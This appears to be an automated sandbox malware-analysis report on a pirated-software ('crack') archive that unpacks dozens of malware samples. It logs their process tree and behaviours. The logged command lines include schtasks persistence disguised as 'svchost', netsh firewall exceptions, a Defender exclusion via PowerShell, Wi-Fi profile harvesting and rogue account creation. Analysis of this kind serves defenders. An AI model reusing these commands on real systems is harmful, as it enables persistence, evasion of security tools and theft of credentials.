Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6308 schtasks.exe 6864 schtasks.exe 7800 schtasks.exe 7212 schtasks.exe 5916 schtasks.exe 6764 schtasks.exe 3460 schtasks.exe 5952 schtasks.exe 4016 schtasks.exe 5512 schtasks.exe 6732 schtasks.exe 7100 schtasks.exe 5440 schtasks.exe 5404 schtasks.exe 8008 schtasks.exe 5452 schtasks.exe 2860 schtasks.exe 7856 schtasks.exe 5916 schtasks.exe 5928 schtasks.exe 3336 schtasks.exe 5768 schtasks.exe 4848 schtasks.exe 5172 schtasks.exe 4728 schtasks.exe 6308 schtasks.exe 6484 schtasks.exe 7892 schtasks.exe 7056 schtasks.exe 7192 schtasks.exe 8064 schtasks.exe 7424 schtasks.exe 3748 schtasks.exe 6412 schtasks.exe 5104 schtasks.exe 3328 schtasks.exe 7556 schtasks.exe 7404 schtasks.exe 6208 schtasks.exe 6740 schtasks.exe 5172 schtasks.exe 3680 schtasks.exe 6848 schtasks.exe 7532 schtasks.exe 4484 schtasks.exe 7472 schtasks.exe 5888 schtasks.exe 1388 schtasks.exe 7308 schtasks.exe 6576 schtasks.exe 7124 schtasks.exe 1020 schtasks.exe 7056 schtasks.exe 3612 schtasks.exe 2652 schtasks.exe 7704 schtasks.exe 7084 schtasks.exe 6808 schtasks.exe 6520 schtasks.exe 7176 schtasks.exe 1020 schtasks.exe 2600 schtasks.exe 732 schtasks.exe 6760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4912 firefox.exe 3752 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3752 taskmgr.exe Token: SeSystemProfilePrivilege 3752 taskmgr.exe Token: SeCreateGlobalPrivilege 3752 taskmgr.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe Token: SeDebugPrivilege 4912 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe 3752 taskmgr.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe 4912 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 3568 wrote to memory of 4912 3568 firefox.exe 109 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 4316 4912 firefox.exe 110 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 PID 4912 wrote to memory of 3172 4912 firefox.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\クラック.zip1⤵PID:4628
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3752
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3164
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60cdd44d-0480-4ae8-9d19-72539157b8b7} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" gpu3⤵PID:4316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1d3a69d-6cc6-47cf-bda0-8c5f7d6877c3} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" socket3⤵PID:3172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3048 -childID 1 -isForBrowser -prefsHandle 3016 -prefMapHandle 2908 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2139009-321c-415e-8c60-0c11f80bd60f} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:2636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -childID 2 -isForBrowser -prefsHandle 3804 -prefMapHandle 3800 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d787ab8-e88b-4ad8-9fa2-4776718fffa3} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:4924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4752 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {309e3f60-4d44-4ddd-b054-561e7ae0b548} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" utility3⤵
- Checks processor information in registry
PID:4160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5384 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5440 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ddff9d-dd3f-4612-9445-4b75485129aa} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:5616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5544 -prefMapHandle 5540 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c360b088-27ce-4da1-ab5c-58f0f24e6dce} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:5628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5756 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5832 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a0efe08-523d-4f1e-9eb3-9ddcbd536dde} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:5640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1624 -childID 6 -isForBrowser -prefsHandle 2960 -prefMapHandle 6096 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1489d8c4-f16c-46f7-93a8-46d00c5b021c} 4912 "\\.\pipe\gecko-crash-server-pipe.4912" tab3⤵PID:3528
-
-
C:\Program Files (x86)\クラック.exe"C:\Program Files (x86)\クラック.exe"3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3804 -
C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"4⤵PID:1068
-
-
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"4⤵PID:4412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0MjBdhWct5.bat"5⤵PID:7952
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:7516
-
-
-
-
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"4⤵PID:1556
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7996
-
-
-
C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"4⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵PID:6240
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:6292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Exsample.exe6⤵
- Kills process with taskkill
PID:6848
-
-
-
-
C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"4⤵PID:5088
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:5512
-
-
-
C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"4⤵PID:1360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\firefox.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:1480
-
-
-
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"4⤵PID:5492
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Qv6fq8BZXU.bat"5⤵PID:6392
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:7340
-
-
C:\Windows\twain_32\dwm.exe"C:\Windows\twain_32\dwm.exe"6⤵PID:6536
-
-
-
-
C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"4⤵PID:5560
-
-
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"4⤵PID:5776
-
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"5⤵PID:7144
-
-
-
C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"4⤵PID:5952
-
C:\Windows\winhlp32.exewinhlp32.exe -x5⤵PID:1084
-
-
C:\Windows\winhlp32.exewinhlp32.exe -x5⤵PID:864
-
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"4⤵PID:4620
-
-
C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"4⤵PID:4100
-
-
C:\Program Files (x86)\BTZ.exe"C:\Program Files (x86)\BTZ.exe"4⤵PID:2888
-
-
C:\Program Files (x86)\Cat.exe"C:\Program Files (x86)\Cat.exe"4⤵PID:4792
-
-
C:\Program Files (x86)\Client.exe"C:\Program Files (x86)\Client.exe"4⤵PID:3136
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit5⤵PID:6856
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:6208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit5⤵PID:6408
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit5⤵PID:6108
-
-
-
C:\Program Files (x86)\Darkest Dungeon setub.exe"C:\Program Files (x86)\Darkest Dungeon setub.exe"4⤵PID:3760
-
C:\Users\Admin\AppData\Roaming\svhost.exe"C:\Users\Admin\AppData\Roaming\svhost.exe"5⤵PID:6184
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svhost.exe" "svhost.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:6824
-
-
-
-
C:\Program Files (x86)\evil.exe"C:\Program Files (x86)\evil.exe"4⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\evil.exe"C:\Users\Admin\AppData\Local\Temp\evil.exe"5⤵PID:6920
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:7440
-
-
-
-
C:\Program Files (x86)\fwclt.exe"C:\Program Files (x86)\fwclt.exe"4⤵PID:6044
-
-
C:\Program Files (x86)\Gandcrab5.0.3.exe"C:\Program Files (x86)\Gandcrab5.0.3.exe"4⤵PID:1892
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\System32\wermgr.exe"5⤵PID:6792
-
-
-
C:\Program Files (x86)\Happy18.exe"C:\Program Files (x86)\Happy18.exe"4⤵PID:640
-
-
C:\Program Files (x86)\kosomk.exe"C:\Program Files (x86)\kosomk.exe"4⤵PID:3004
-
C:\Users\Admin\AppData\Roaming\dicsord.exe"C:\Users\Admin\AppData\Roaming\dicsord.exe"5⤵PID:6872
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\dicsord.exe" "dicsord.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:5508
-
-
-
-
C:\Program Files (x86)\LightNeuronX0.exe"C:\Program Files (x86)\LightNeuronX0.exe"4⤵PID:5484
-
-
C:\Program Files (x86)\malecus.exe"C:\Program Files (x86)\malecus.exe"4⤵PID:5016
-
-
C:\Program Files (x86)\see7.exe"C:\Program Files (x86)\see7.exe"4⤵PID:2676
-
-
C:\Program Files (x86)\TEST.exe"C:\Program Files (x86)\TEST.exe"4⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\touhou virus.bat" "4⤵PID:4088
-
C:\Windows\SysWOW64\net.exenet user Shanghai /add5⤵PID:7496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Shanghai /add6⤵PID:7456
-
-
-
C:\Windows\SysWOW64\net.exenet user Bad Apple /add5⤵PID:2760
-
-
-
C:\Program Files (x86)\vbc.exe"C:\Program Files (x86)\vbc.exe"4⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exeC:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny5⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exeC:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny6⤵PID:6460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 6126⤵
- Program crash
PID:7004
-
-
-
-
C:\Program Files (x86)\virus.jk.exe"C:\Program Files (x86)\virus.jk.exe"4⤵PID:6508
-
C:\Program Files (x86)\virus.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.exe"5⤵PID:7104
-
C:\Program Files (x86)\virus.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.exe"6⤵PID:6516
-
C:\Program Files (x86)\virus.jk.jk.jk.jk.exe"C:\Program Files (x86)\virus.jk.jk.jk.jk.exe"7⤵PID:6604
-
